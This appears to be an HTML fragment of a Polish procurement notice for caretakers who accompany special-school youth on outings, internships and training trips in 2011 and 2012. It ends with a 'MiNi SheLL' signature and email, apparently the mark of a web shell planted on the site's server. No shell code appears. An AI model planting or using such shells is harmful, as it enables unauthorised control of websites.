<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Opiekun nr 1 do ON I klasy SSPdP na zajęcia kulturalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część 4 - Opiekuna nr 1 do ON I klasy SSPdP na zajęcia kulturalne;
do głównych obowiązków opiekuna należeć będzie, w szczególności:
---opracowanie programu wyjścia w uzgodnieniu z rodzicami młodzieży;
---sprawowanie opieki nad młodzieżą podczas wyjścia;
---opracowanie ankiety badającej zadowolenie uczestników wyjścia, przeprowadzenie jej i oddanie specjaliście ds. ewaluacji i monitoringu
---sporządzenie notatki z przebiegu zajęć. 
Przewidywana liczba godzin świadczenia obowiązków opiekuna wynosi 70 godzin.
Od lutego 2011 do grudnia 2011 - 6 wyjść po 5 godz.
Od stycznia 2012 do listopada 2012 - 8 wyjść po 5 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Opiekun nr 2 do ON I klasy SSPdP na zajęcia kulturalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> do głównych obowiązków opiekuna należeć będzie, w szczególności:
---opracowanie programu wyjścia w uzgodnieniu z rodzicami młodzieży;
---sprawowanie opieki nad młodzieżą podczas wyjścia;
---opracowanie ankiety badającej zadowolenie uczestników wyjścia, przeprowadzenie jej i oddanie specjaliście ds. ewaluacji i monitoringu
---sporządzenie notatki z przebiegu zajęć. 
Przewidywana liczba godzin świadczenia obowiązków opiekuna wynosi 70 godzin.
Od lutego 2011 do grudnia 2011 - 6 wyjść po 5 godz.
Od stycznia 2012 do listopada 2012 - 8 wyjść po 5 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Opiekun nr 1 do ON II klas SSPdP na zajęcia kulturalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> do głównych obowiązków opiekuna należeć będzie, w szczególności:
---opracowanie programu wyjścia w uzgodnieniu z rodzicami młodzieży;
---sprawowanie opieki nad młodzieżą podczas wyjścia;
---opracowanie ankiety badającej zadowolenie uczestników wyjścia, przeprowadzenie jej i oddanie specjaliście ds. ewaluacji i monitoringu
---sporządzenie notatki z przebiegu zajęć. 
Przewidywana liczba godzin świadczenia obowiązków opiekuna wynosi 70 godzin.
Od lutego 2011 do grudnia 2011 - 6 wyjść po 5 godz.
Od stycznia 2012 do listopada 2012 - 8 wyjść po 5 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Opiekun nr 2 do ON II klas SSPdP na zajęcia kulturalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> do głównych obowiązków opiekuna należeć będzie, w szczególności:
---opracowanie programu wyjścia w uzgodnieniu z rodzicami młodzieży;
---sprawowanie opieki nad młodzieżą podczas wyjścia;
---opracowanie ankiety badającej zadowolenie uczestników wyjścia, przeprowadzenie jej i oddanie specjaliście ds. ewaluacji i monitoringu
---sporządzenie notatki z przebiegu zajęć. 
Przewidywana liczba godzin świadczenia obowiązków opiekuna wynosi 70 godzin.
Od lutego 2011 do grudnia 2011 - 6 wyjść po 5 godz.
Od stycznia 2012 do listopada 2012 - 8 wyjść po 5 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Opiekun stażu nr 1 u pracodawcy do ON III klas SSPdP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ---opracowanie programu wyjścia w uzgodnieniu z rodzicami młodzieży;
---sprawowanie opieki nad młodzieżą podczas wyjścia;
---opracowanie ankiety badającej zadowolenie uczestników wyjścia, przeprowadzenie jej i oddanie specjaliście ds. ewaluacji i monitoringu
---sporządzenie notatki z przebiegu zajęć. 
Przewidywana liczba godzin świadczenia obowiązków opiekuna wynosi 192 godzin.
Od lutego 2011 do grudnia 2011 - 112 godz.
Od stycznia 2012 do listopada 2012 - 80 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Opiekun stażu nr 2 u pracodawcy do ON III klas SSPdP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> do głównych obowiązków opiekuna należeć będzie, w szczególności:
---opracowanie programu wyjścia w uzgodnieniu z rodzicami młodzieży;
---sprawowanie opieki nad młodzieżą podczas wyjścia;
---opracowanie ankiety badającej zadowolenie uczestników wyjścia, przeprowadzenie jej i oddanie specjaliście ds. ewaluacji i monitoringu
---sporządzenie notatki z przebiegu zajęć. 
Przewidywana liczba godzin świadczenia obowiązków opiekuna wynosi 70 godzin.
Od lutego 2011 do grudnia 2011 - 6 wyjść po 5 godz.
Od stycznia 2012 do listopada 2012 - 8 wyjść po 5 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.29-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Opiekun nr 1 do ON III klas SSPdP na zajęcia kulturalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część 10 - Opiekuna nr 1 do ON III klas SSPdP na zajęcia kulturalne;
do głównych obowiązków opiekuna należeć będzie, w szczególności:
---opracowanie programu wyjścia w uzgodnieniu z rodzicami młodzieży;
---sprawowanie opieki nad młodzieżą podczas wyjścia;
---opracowanie ankiety badającej zadowolenie uczestników wyjścia, przeprowadzenie jej i oddanie specjaliście ds. ewaluacji i monitoringu
---sporządzenie notatki z przebiegu zajęć. 
Przewidywana liczba godzin świadczenia obowiązków opiekuna wynosi 70 godzin.
Od lutego 2011 do grudnia 2011 - 6 wyjść po 5 godz.
Od stycznia 2012 do listopada 2012 - 8 wyjść po 5 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Opiekun nr 2 do ON III klas SSPdP na zajęcia kulturalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> do głównych obowiązków opiekuna należeć będzie, w szczególności:
---opracowanie programu wyjścia w uzgodnieniu z rodzicami młodzieży;
---sprawowanie opieki nad młodzieżą podczas wyjścia;
---opracowanie ankiety badającej zadowolenie uczestników wyjścia, przeprowadzenie jej i oddanie specjaliście ds. ewaluacji i monitoringu
---sporządzenie notatki z przebiegu zajęć. 
Przewidywana liczba godzin świadczenia obowiązków opiekuna wynosi 70 godzin.
Od lutego 2011 do grudnia 2011 - 6 wyjść po 5 godz.
Od stycznia 2012 do listopada 2012 - 8 wyjść po 5 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Opiekun ON nr 1 na wyjazd szkoleniowy z warsztatów zawodowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> do głównych obowiązków opiekuna należeć będzie, w szczególności:
---opracowanie programu zajęć w uzgodnieniu z rodzicami młodzieży;
---sprawowanie opieki nad młodzieżą podczas wyjazdu szkoleniowego;
---opracowanie ankiety badającej zadowolenie uczestników wyjazdu szkoleniowego, przeprowadzenie jej i oddanie specjaliście ds. ewaluacji i monitoringu
---sporządzenie notatki z przebiegu wyjazdu szkoleniowego. 
Przewidywana liczba dni świadczenia obowiązków opiekuna wynosi 10.
W przełom czerwca/lipca 2011 - 5 dni
W przełom czerwca/lipca 2012 -5 dni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Opiekun ON nr 2 na wyjazd szkoleniowy z warsztatów zawodowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> do głównych obowiązków opiekuna należeć będzie, w szczególności:
---opracowanie programu zajęć w uzgodnieniu z rodzicami młodzieży;
---sprawowanie opieki nad młodzieżą podczas wyjazdu szkoleniowego;
---opracowanie ankiety badającej zadowolenie uczestników wyjazdu szkoleniowego, przeprowadzenie jej i oddanie specjaliście ds. ewaluacji i monitoringu
---sporządzenie notatki z przebiegu wyjazdu szkoleniowego
Przewidywana liczba dni świadczenia obowiązków opiekuna wynosi 10.
W przełom czerwca/lipca 2011 - 5 dni
W przełom czerwca/lipca 2012 -5 dni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Opiekun do opieki nad dziećmi - podczas zajęć z rodzicami;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> do głównych obowiązków opiekuna należeć będzie, w szczególności:
---opracowanie programu zajęć w uzgodnieniu z rodzicami młodzieży;
---sprawowanie opieki nad młodzieżą podczas zajęć;
---opracowanie ankiety badającej zadowolenie uczestników zajęć, przeprowadzenie jej i -oddanie specjaliście ds. ewaluacji i monitoringu
---sporządzenie notatki z przebiegu zajęć. 
Przewidywana liczba godzin świadczenia obowiązków opiekuna wynosi 33 godzin.
Od lutego 2011 do grudnia 2011
Od stycznia 2012 do listopada 2012.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 83.31.21.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com